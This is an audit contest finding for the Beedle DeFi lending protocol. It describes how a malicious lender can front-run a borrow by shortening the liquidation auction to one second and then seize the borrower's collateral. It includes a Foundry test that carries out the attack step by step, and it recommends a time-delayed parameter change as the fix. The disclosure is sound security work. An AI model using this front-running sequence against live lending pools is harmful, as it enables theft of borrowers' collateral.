Beedle - Oracle free perpetual lending

BeedleFi

DeFiFoundry

20,000 USDC

View results

Previous Next

Submission Details

Severity: high

Valid

Changing the length of the liquidation auction in a front-run transaction may lead to immediate collateral seizure

qbs

Summary

Borrower's collateral can be immediately seized due to possibility of changing length of liquidation auction by front-run transaction.

Vulnerability Details

The setPool function allows lenders to set up a pool, providing all necessary parameters. This function can also be called on an existing pool, allowing changes to some of the current pool parameters, including the length of liquidation auctions. The malicious lender can front-run a user's borrow request and change the auctionLength value to 1 second. Then, they can start a refinance auction and seize the user's collateral in the subsequent block before the user has a chance to react.

function test_exploitCollateralSeize() public{

//Lender creates legitimate pool with auctionLength = 1 days

vm.startPrank(lender1);

Pool memory p = Pool({

lender: lender1,

loanToken: address(loanToken),

collateralToken: address(collateralToken),

minLoanSize: 50*10**18,

poolBalance: 1000*10**18,

maxLoanRatio: 1.5*10**18,

auctionLength: 1 days,

interestRate: 1000,

outstandingLoans: 0

});

bytes32 poolId = lender.setPool(p);

//Lender frontrun user's borrow request and change auctionLength for 1 sec

p = Pool({

lender: lender1,

loanToken: address(loanToken),

collateralToken: address(collateralToken),

minLoanSize: 50*10**18,

poolBalance: 1000*10**18,

maxLoanRatio: 1.5*10**18,

auctionLength: 1,

interestRate: 1000,

outstandingLoans: 0

});

poolId = lender.setPool(p);

//Borrower request a loan from the front-run pool

vm.startPrank(borrower);

Borrow memory b = Borrow({

poolId: poolId,

debt: 50*10**18,

collateral: 100*10**18

});

Borrow[] memory borrows = new Borrow[](1);

borrows[0] = b;

lender.borrow(borrows);

//lender starts a refinance auction

vm.startPrank(lender1);

uint256[] memory loanIds = new uint256[](1);

loanIds[0] = 0;

lender.startAuction(loanIds);

//Lender seize collateral in the next block

skip(1);

lender.seizeLoan(loanIds);

}

Impact

Borrower's collateral may be seized right after receiving a loan.

Tools Used

Manual review.

Recommendations

Disallow lenders from changing the auctionLength parameter in the setPool function. Implement a separate function that can change the auctionLength parameter but with a time delay, which adds an extra layer of security and mitigates the potential for front-running.

Prize pool breakdown

Total prize

20,000 USDC

nSLOC

706

28 USDC / LOC

High Medium

18,000 USDC

Low

2,000 USDC

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being carefully reviewed by our judges.

View all submissions

Appeals

This is your time to appeal against judgements on your submissions.

Appeals Review

Appeals are being carefully reviewed by our judges.

Rewards Distribution

The contest is complete and the rewards are being distributed.

View results

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!